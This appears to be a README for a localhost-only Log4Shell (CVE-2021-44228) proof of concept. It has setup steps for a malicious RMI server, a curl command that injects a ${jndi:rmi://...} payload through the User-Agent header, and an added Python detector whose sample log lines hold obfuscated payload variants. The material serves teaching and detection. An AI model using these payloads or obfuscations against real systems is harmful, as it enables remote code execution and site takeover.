This code may contain malware and is known to contain vulnerabilities. Use at your own risk: if you run it, do so in a throwaway VM and discard the VM after use.
This is a proof of concept for the Log4j vulnerability (CVE-2021-44228, "Log4Shell"). It works by getting a vulnerable Log4j instance to evaluate a ${jndi:...} lookup in a logged value, which pulls external code via JNDI over RMI.
It leverages the vulnerable Log4j 2 version pulled in by spring-boot-starter-log4j2 2.5.7.
This repository and the exploit are heavily inspired by Labout/log4shell-rmi-poc, but updated and adapted to modern Java versions.
There are no requirements except Java. The code has been tested with Java 8 (JDK 1.8.0_25), Java 11 (JDK 11.0.1) and Java 19 (openjdk 19.0.2).
git clone https://github.com/rhuss/log4shell-poc.git
cd inject-server
./startRmiServer.sh
You should see output like this:
a target/classes/static
a target/classes/static/index.html
a target/classes/static/img
a target/classes/static/img/wc.png
Starting malicious RMI Server
Creating evil RMI registry on port 1099
Bind remote exploit to 'WannaCry'
In a new terminal:
cd vulnerable-app
./startVulnerableService.sh
open http://localhost:8080
The original, unmodified website opens in your browser. Now send a request whose User-Agent header carries the JNDI lookup:
curl http://localhost:8080 --header 'User-Agent: ${jndi:rmi://127.0.0.1:1099/WannaCry}'
The vulnerable app logs the User-Agent header, Log4j evaluates the lookup and fetches the payload from the malicious RMI server started in the first step, and the website content is replaced with the data that server provides.
Note
As a safeguard against real exploitation, this only works when the request comes from a client located at 127.0.0.1.
open http://localhost:8080
(or just reload the previous page in your browser). The hacked website is now returned instead of the original one.
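The curl request above only triggers because Log4j expands ${...} lookups inside logged strings, innermost first, and the jndi: prefix then hands the remaining text to a JNDI lookup. The following is an added example, not code from this repository or from Log4j: a small Python re-implementation of that substitution (lower, upper, env, the :- default syntax, and a jndi handler that records the URI instead of connecting anywhere) plus a detector that runs it over log lines. It is useful for seeing why obfuscated variants such as ${${lower:j}ndi:...} or ${${::-j}${::-n}${::-d}${::-i}:...} resolve to exactly the payload used on this page, and for catching them in access logs. The log lines and the unresolved ${java:version} lookup are constructed for the example; lookups the code does not implement are left literal, as Log4j does with unresolvable ones.

```python
import re

# Matches the innermost ${...} expressions, i.e. ones with no nested "${" or "}".
LOOKUP_RE = re.compile(r"\$\{([^${}]*)\}")

# Constructed access-log lines in the style of the PoC's curl request (not real captures).
SAMPLE_LOG_LINES = [
    '127.0.0.1 - "GET / HTTP/1.1" 200 "curl/7.79.1"',
    '127.0.0.1 - "GET / HTTP/1.1" 200 "${jndi:rmi://127.0.0.1:1099/WannaCry}"',
    '10.0.0.5 - "GET / HTTP/1.1" 200 "${${lower:j}ndi:${lower:rmi}://127.0.0.1:1099/WannaCry}"',
    '10.0.0.5 - "GET / HTTP/1.1" 200 "${${::-j}${::-n}${::-d}${::-i}:${env:NaN:-rmi}://127.0.0.1:1099/WannaCry}"',
    '10.0.0.5 - "GET / HTTP/1.1" 200 "Mozilla/5.0 ${java:version}"',
]


def _split_default(expr):
    """Split 'name:-default' into (name, default); default is None when absent."""
    if ":-" in expr:
        name, default = expr.split(":-", 1)
        return name, default
    return expr, None


def resolve_lookups(text, env=None, max_rounds=32):
    """Expand Log4j-style lookups in text (innermost first), mirroring the
    lookups that matter for Log4Shell payloads. Returns (expanded_text, jndi_uris).
    The jndi handler never performs a lookup; it only records the target URI."""
    env = env or {}
    jndi_uris = []

    def handler(name):
        # Log4j splits "prefix:argument" on the first colon and lower-cases the prefix,
        # so ${JNDI:...} and ${jNdI:...} behave like ${jndi:...}.
        if ":" not in name:
            return None
        prefix, arg = name.split(":", 1)
        prefix = prefix.lower()
        if prefix == "lower":
            return arg.lower()
        if prefix == "upper":
            return arg.upper()
        if prefix == "env":
            return env.get(arg)
        if prefix == "jndi":
            jndi_uris.append(arg)
            return f"<jndi-lookup:{arg}>"
        return None  # unsupported lookup: fall through to the default, if any

    def repl(match):
        name, default = _split_default(match.group(1))
        value = handler(name)
        if value is None:
            value = default
        # Unresolvable with no default: leave the literal ${...} in place, as Log4j does.
        return match.group(0) if value is None else value

    for _ in range(max_rounds):
        expanded = LOOKUP_RE.sub(repl, text)
        if expanded == text:
            break
        text = expanded
    return text, jndi_uris


def find_jndi_payloads(log_lines, env=None):
    """Return (line, jndi_uri) for every line that would trigger a JNDI lookup
    after full expansion, including obfuscated spellings of the jndi prefix."""
    hits = []
    for line in log_lines:
        _, uris = resolve_lookups(line, env)
        for uri in uris:
            hits.append((line, uri))
    return hits


if __name__ == "__main__":
    for line, uri in find_jndi_payloads(SAMPLE_LOG_LINES):
        print(f"JNDI lookup to {uri} in: {line}")
```

The detector deliberately expands before matching: a naive grep for the literal string "jndi:" misses the third and fourth sample lines, while the expansion catches all three payloads and reports the same rmi://127.0.0.1:1099/WannaCry target that the curl command on this page uses.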